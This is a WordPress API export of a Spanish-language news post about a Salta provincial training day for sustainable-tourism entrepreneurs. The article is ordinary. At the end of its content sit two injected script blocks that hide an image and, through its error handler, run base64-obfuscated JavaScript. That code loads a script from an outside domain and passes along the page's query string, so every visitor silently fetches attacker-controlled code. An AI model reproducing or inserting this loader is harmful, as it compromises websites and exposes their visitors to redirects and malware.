{"id":2976,"date":"2023-08-10T09:05:51","date_gmt":"2023-08-10T12:05:51","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2976"},"modified":"2025-08-14T00:10:43","modified_gmt":"2025-08-14T03:10:43","slug":"turismo-sostenible-el-gobierno-y-los-emprendedores-una-alianza-clave-para-el-desarrollo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2976","title":{"rendered":"Turismo sostenible: El Gobierno y los emprendedores una alianza clave para el desarrollo"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#a4062e\"><em>\u201cEmprendedores en Acci\u00f3n por un Destino Sostenible\u201d fue la capacitaci\u00f3n realizada y destinada a emprendedores tur\u00edsticos de toda la provincia. La acci\u00f3n forma parte del programa gratuito de formaci\u00f3n que el Gobierno ofrece durante todo el a\u00f1o.<\/em><\/h4>\n\n\n\n<p>El ministro de Turismo y Deportes,&nbsp;<strong>Mario Pe\u00f1a<\/strong>&nbsp;abri\u00f3 esta ma\u00f1ana la jornada \u201cEmprendedores en Acci\u00f3n por un Destino Sostenible\u201d que congreg\u00f3 a referentes de C\u00e1maras Empresarias, gestores tur\u00edsticos de la provincia y emprendedores participantes del Programa Turismo te Capacita de la cartera tur\u00edstica provincial.<\/p>\n\n\n\n<p>En la oportunidad, el funcionario destac\u00f3 la decisi\u00f3n del Gobierno de trabajar el turismo como pol\u00edtica de Estado con un fuerte sentido federal, apoyando al emprendedor en todo el territorio.&nbsp;\u201cSalta es Salta por la cantidad, la magnitud y el profesionalismo de nuestros emprendedores\u201d, dijo. Asimismo, se refiri\u00f3 a la generaci\u00f3n de empleo que del turismo y asegur\u00f3 que&nbsp;\u201cser emprendedor es un camino que no es f\u00e1cil pero s\u00ed gratificante pues apuesta al desarrollo y al crecimiento\u201d.<\/p>\n\n\n\n<p>En cuanto al Programa de Emprendedores y el Poder de los Detalles, el Ministro se\u00f1al\u00f3 que somos una de las provincias argentinas que m\u00e1s cuida sus recursos naturales en los emprendimientos y acot\u00f3 que en las ferias internacionales Salta promociona sus acciones de sustentabilidad que es una exigencia de los turistas. &nbsp;Por \u00faltimo, indic\u00f3 que en Salta en los mediante el INTUR se recibieron fondos no reembolsables por 100 millones para diversos emprendimientos.<\/p>\n\n\n\n<p>Por su parte, el presidente de la C\u00e1mara de Turismo&nbsp;<strong>Juan Lucero<\/strong>&nbsp;inici\u00f3 su alocuci\u00f3n asegurando: \u201clos emprendedores somos so\u00f1adores empedernidos\u201d y continu\u00f3 enfatizando la importancia del apoyo del gobierno pues \u201cemprender desde cualquier lugar de la Argentina permitir\u00e1 sacarla adelante\u201d.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8351-turismo-sostenible-el-gobierno-y-los-emprendedores-una-alianza-clave-para-el-desarrollo.jpeg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8351-turismo-sostenible-el-gobierno-y-los-emprendedores-una-alianza-clave-para-el-desarrollo.jpeg\" alt=\"Turismo sostenible: El Gobierno y los emprendedores una alianza clave para el desarrollo\" width=\"334\" height=\"261\"\/><\/a><\/figure><\/div>\n\n\n<p>Cecilia Camou, referente del programa de formaci\u00f3n el \u201cPoder de los detalles\u201d, destac\u00f3 que 153 &nbsp;emprendedores cumplieron con las exigencias del programa, hubo 273 beneficiarios y se realizaron 1189 mejores; asimismo, inform\u00f3 que se est\u00e1 trabajando en la elaboraci\u00f3n de un mapa para visibilizar peque\u00f1os y medianos emprendedores que participaron de la capacitaci\u00f3n.&nbsp;<\/p>\n\n\n\n<p>Posteriormente, se realiz\u00f3 un conversatorio con emprendedoras que forman parte del programa anual de formaci\u00f3n para que cada una pudiera comentar sobre sus inicios y las ventajas de la capacitaci\u00f3n para superar dificultades. Presentaron sus experiencias Marcela Aranda y Natalia Bustamante de Ciclatour, Laura Carando de Brisas del Cielo, Mirian Tapia del Parador Las Abritas; el conversatorio estuvo moderado por Cecilia Camou y Viviana Santin\u00f3n.<\/p>\n\n\n\n<p>Adem\u00e1s, la jornada cont\u00f3 con la participaci\u00f3n de emprendedores que expusieron temas relacionados con el emprendedurismo: Jorge Lindon se refiri\u00f3 a \u00bfC\u00f3mo pasar de la idea al negocio?; &nbsp;Marcelo Paz a Tips para Emprender en turismo con \u00e9xito; 11.00: El ocio desgastado y c\u00f3mo renovar las experiencias tur\u00edsticas a cargo de Cecilia Camou; Franco Torres expuso Artesanos de recuerdos. El valor de nuestra historia en la experiencia del cliente; Nelson Veliz\u00e1n expuso \u00bfC\u00f3mo me presento al mundo digital? Marcelo Molinillo Turismo y sostenibilidad.<\/p>\n\n\n\n<p>Participaron el subsecretario de Desarrollo y Competitividad Tur\u00edstica Alejandro Cha Usandivaras, autoridades de c\u00e1maras del interior, secretarios y directores de turismo municipales.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/turismo-sostenible-el-gobierno-y-los-emprendedores-una-alianza-clave-para-el-desarrollo-91151\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>\u201cEmprendedores en Acci\u00f3n por un Destino Sostenible\u201d fue la capacitaci\u00f3n realizada y destinada a emprendedores tur\u00edsticos de toda la provincia. La acci\u00f3n forma parte del programa gratuito de formaci\u00f3n que el Gobierno ofrece durante todo el a\u00f1o. El ministro de Turismo y Deportes,&nbsp;Mario Pe\u00f1a&nbsp;abri\u00f3 esta ma\u00f1ana la jornada \u201cEmprendedores en Acci\u00f3n por un Destino Sostenible\u201d [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2977,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,17],"tags":[],"class_list":{"0":"post-2976","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2976"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2976"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2976\/revisions"}],"predecessor-version":[{"id":6996,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2976\/revisions\/6996"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2977"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2976"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2976"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2976"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}